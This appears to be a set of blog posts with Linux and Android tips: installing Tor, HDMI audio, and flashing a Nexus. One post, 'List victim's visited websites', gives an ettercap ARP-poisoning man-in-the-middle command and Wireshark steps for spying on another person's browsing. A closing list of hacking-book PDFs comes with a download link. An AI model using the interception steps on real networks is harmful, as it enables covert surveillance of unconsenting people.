Install tor on Ubuntu 15.10

From command line:

sudo gedit /etc/apt/sources.list.d/tor.list

in this file write those lines:

deb http://deb.torproject.org/torproject.org wily main
deb-src http://deb.torproject.org/torproject.org wily main

save, then run:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
sudo apt-get update
sudo apt-get install tor deb.torproject.org-keyring

Now you can find a folder named “tor-browser_en-US” in your home folder that contains the Tor Browser.

It comes with readily configured Tor and a browser patched for better anonymity.

 

Enable HDMI audio Debian-Ubuntu

You plug the HDMI, the video works but you have no audio. Ok, go on.

PulseAudio is a sound system for POSIX OSes, meaning that it is a proxy for your sound applications. It allows you to do advanced operations on your sound data as it passes between your application and your hardware. Things like transferring the audio to a different machine, changing the sample format or channel count and mixing several sounds into one are easily achieved using a sound server. PulseAudio is an integral part of all relevant modern Linux distributions and used in various mobile devices by multiple vendors. PulseAudio is an integral part of all relevant modern Linux distributions and used in various mobile devices by multiple vendors.

List name or index number of possible sinks:

pacmd list-sinks

you should see a “*” near the index of the sink actually in use.

If you see only one sink you are in trouble, the system doesn’t recognize the device. Search away!

Otherwise connect the HDMI, take an mp3 and try:

pacmd set-default-sink sinkIndex
pulseaudio -k
pacmd set-default-sink -D

varying the value of sinkIndex using the values found with  pacmd list-sinks but be careful to close the program that you use to play the mp3.

Update Nexus without losing data

Depend on several things OTA updates fails on your rooted devices or you want to manually  upgrade your android.

Download the factory image of your Nexus from:

https://developers.google.com/android/nexus/images

Extract the archive and edit the flash-all file (.bat if you are under Windows or .sh if you are under Linux).

 

You have to remove the “-w” option from the command on line 23:

fastboot -w update image-....

It will become:

fastboot update image-.....

Reboot in fastboot mode with:

 adb reboot bootloader

And then you can run the flash-all script.

List victim’s visited websites

This is the easy and cheaper way:

you also need a Linux distro with Ettercap and Wireshark.

From command line type:

ettercap -T -Q -M arp:remote -i iface -w log.pcap /victimip/ /gatewayip/

What are you doing?

-T text only interface, only printf

-Q  Super quiet mode

-M arp:remote perform a MITM attack using ARP poisoning. “remote” is optional and you have to specify it if you want to sniff remote ip address poisoning a gateway. Indeed if you specify a victim and the gw in the TARGETS, ettercap will sniff only connection between them.

-i iface force using the “iface” network interface

-w log.pcap write sniffed data to “log.pcap” file

 

Open Wireshark and import the .pcap file, then go to:

Statistics -> HTTP -> Load Distribution

In the box type:

 http.host

Now look at the “HTTP Requests by HTTP Hosts“.

This will show you all the sniffed in/out  HTTP type traffic.

But take a look about Xplico

Best computer and network security books

---
Dissecting_the_Hack_Revised_Edition-[Street-Nabors-Baskin-Carey]-(2010).pdf
Hacking_The_Art_of_Exploitation_2nd-[Erickson]-(2008).pdf
XSS_Attacks:_Cross_Site_Scripting_Exploits_and_Defense-[Fogie-Grossman-Hansen-Rager-Petkov]-(2007).pdf
The_Web_Application_Hacker's_Handbook_2nd-[Stuttard-Pinto]-(2011).pdf
Netcat_Power_Tools-[Kanclirz]-(2008).pdf
Metasploit_The_Penetration_Tester's_Guide-[Kennedy-O'Gorman-Kearns]-(2011).pdf
Introduction_to_Modern_Cryptography-[Katz-Lindell]-(2007).pdf
Hacking_Exposed_6th-[McClure-Scambray-Kurtz]-(2009).pdf
Cracking_Passwords_Guide_1.1-[Dravet]-(2010).pdf
The_Art_of_Intrusion-[Kevin_Mitnick]-(2005).pdf
Nmap_Cookbook_The_Fat_free_Guide_to_Network_Scanning-[Nicholas_Marsh]-(2010).pdf
Practical_Packet_Analysis_Using_Wireshark_To_Solve_Real_World_Network_Problems_2nd-[Chris_Sanders]-(2011).pdf
Penetration_Tester_Open_Source_Toolkit_3rd-[Jeremy_Faircloth]-(2011).pdf
SQL_Injection_Attacks_and_Defense-[Clarke]-(2009).pdf
---

http://www.multiupload.nl/YANT7ZE08W